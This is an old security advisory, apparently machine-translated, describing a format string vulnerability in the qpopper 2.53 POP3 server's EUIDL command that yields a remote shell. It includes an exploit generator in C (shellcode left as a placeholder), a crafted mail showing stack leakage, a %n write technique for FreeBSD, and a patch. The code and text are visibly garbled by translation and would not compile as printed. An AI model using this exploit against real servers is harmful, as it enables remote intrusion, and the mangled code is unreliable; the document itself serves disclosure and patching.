[Practice] obtain shell remotely through qpopper2.53

Obtain shell remotely through qpopper2.53

Created at: 2000-05-27
Article attributes: original
Article submission: Quack (quack_at_xfocus.org)

Obtain shell remotely through qpopper2.53

By quack
Reference: Bufferoverflow secrurity advisory #5 by prizm

* Brief description
Qpopper is a widely used POP3 server that allows users to read their emails through the POP3 client.
It is usually used for mail services in standard UNIX systems.

* Problem
In qpopper2.53, the QPOP vulnerability allows you to remotely obtain a shell with gid = Mail.
The problem lies in the pop_msg () function. An error occurs when you execute the euidl command. Let's check Qpop.
Code 2.53:

--> Pop_uidl.c, in line 150th:
................
Sprintf (buffer, "% d % s", msg_id, MP-> uidl_str );
If (NL = index (buffer, newline) * Nl = 0;
Sprintf (buffer, "% S % d %. 128 s", buffer, MP-> length, from_hdr (p, MP ));
! Return (pop_msg (p, pop_success, buffer ));
^
.................
In pop_msg.c, the function pop_msg () is defined as: pop_msg (pop * P, int stat,
Const char * format,...), here is the format entered by the user :)
Now, let's imagine the following situation:

Mail from: 200 OK
Rcpt to: <luser@host.withqpop253.com>
200 OK
Data
200 okey, okey. end "."
Subject: still trust QPOP? =/
X-UIDL: aaaaaaaaaaaaaaaa
From: % P

Test
.
200 blablabla OK, message accepted for delivery.

Then the user luser connects to his POP account and runs the euidl command:

+ OK QPOP (version 2.53) at b0f starting. <666.666 @ b0f>
User luser
+ OK Password required for luser.
Pass secret
+ OK luser has 3 messages (1644 octets ).
Euidl 3
+ OK 2 aaaaaaaaaaaaaaaa 530 0xbfbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfd1e80x8057028

Yeah, thats from my box with FreeBSD. As you can see, our % P
Where implemented as arguments for vsnprintf () command.

* Exploitation
Can this be done? Yes, of course!
But there is a small limit. qpopper2.53 running on FreeBSD is more difficult to use than Linux, because
FreeBSD changes the vsprintf () call in the pop_msg.c function to vsnprintf () call.
Significant difference-of course, it can also be used :)

Exploitation Program
--------
/* Qpop_euidl.c exploit by prizm/buffer0verflow Security
*
* Sample exploit for Buffer Overflow in qpopper 2.53.
* This little proggie generates a mail u need to send.
*
* Standard Disclaimer applies.
* By The Way, exploit is broken =) You need to insert shellcode.
*
* Mad greets to tf8 for pointing out of the bug, and all other b0f members.
* Greets to ussrlabs and ADM
* Check http://b0f.freebsd.lublin.pl/for news.
*/
# Include <stdio. h>
# Include <string. h>

Char shellcode [] = "imnothing ";
Int main (INT argc, char * argv [])
{
Int I;
Unsigned long Ra = 0;
If (argc! = 2 ){
Fprintf (stderr, "Usage: % s return_addr/N", argv [0]);
Exit (0 );
}
Sscanf (argv [1], "% x", & RA );
If (! RA)
Return;
If (sizeof (shellcode) <12 | sizeof (shellcode)> 76 ){
Fprintf (stderr, "Bad shellcode/N ");
Exit (0 );
}
Fprintf (stderr, "Return address: 0x %. 8x/N", RA );
Printf ("X-UIDL :");
For (I = 0; I <sizeof (shellcode); I ++)
Printf ("% C", shellcode [I]);
Printf ("/R/N ");
Printf ("from: % s", "%. 1000d ");
For (I = 0; I <50; I ++)
Printf ("% C", (RA & 0xff), (RA & 0xff00)> 8, (RA & 0xff0000)> 16, (RA & 0xff000000)> 24 );
Printf ("@ test/R/N ");
Printf ("Subject: Test/R/n/R/nhuh? /R/n./R/N ");
Return 0;
}

Use the QPOP port on FreeBSD
---------------------

This is not easy, because the vsprintf () function has been replaced by vsnprintf (), so we cannot cause overflow, But we
Still able to control it -- remember % N? The principle is as follows:
Here is a tip to use % N. Let's see the following code. Can you understand why the output result is 2000,
Instead of sizeof (B ):

--- <Cut> ---
# Include <stdio. h>
Int main (void ){
Int S = 1; char B [1024]; int Q;
Snprintf (B, sizeof (B), "%. 2000d % N", 1, & Q );
Return printf ("% d, overflowed? % S/n ", Q, (S = 1? "No": "Yes "));
}
--- </Cut> ---

On my FreeBSD 3.4 machine, I got the following results:
2000, overflowed? No

Hey, I expected to see 1024 at the beginning, but you know-sometimes the running of the program is not easy to control. Let's take a look at the following:
It may be helpful.

Exploiting it:

A) locate the exact position of user input in the stack.
B) compose a message with filed X-UIDL and from:
X-UIDL: ppretaretaretareta.
From: <shellcode> %. returnd % N @ Test
Where:
"PP" is used for filling (two to three bytes)
"RETA" indicates the address of the returned shellcode
"Shellcode" guess
"Return" return address

C) if you need the exploitation program of FreeBSD version-Do It Yourself :)

* Versions with Vulnerabilities
2.53 (What about others? Not sure ......)

* Patch
You can download qpopper 3.1 from http://www.eudora.com/freeware/qpop.html#current
This problem has been solved.

Or you can modify the code by yourself:

In the 150 and 62 rows of pop_msg.c, set:
-Return (pop_msg (p, pop_success, buffer ));
To:
+ Return (pop_msg (p, pop_success, "% s", buffer ));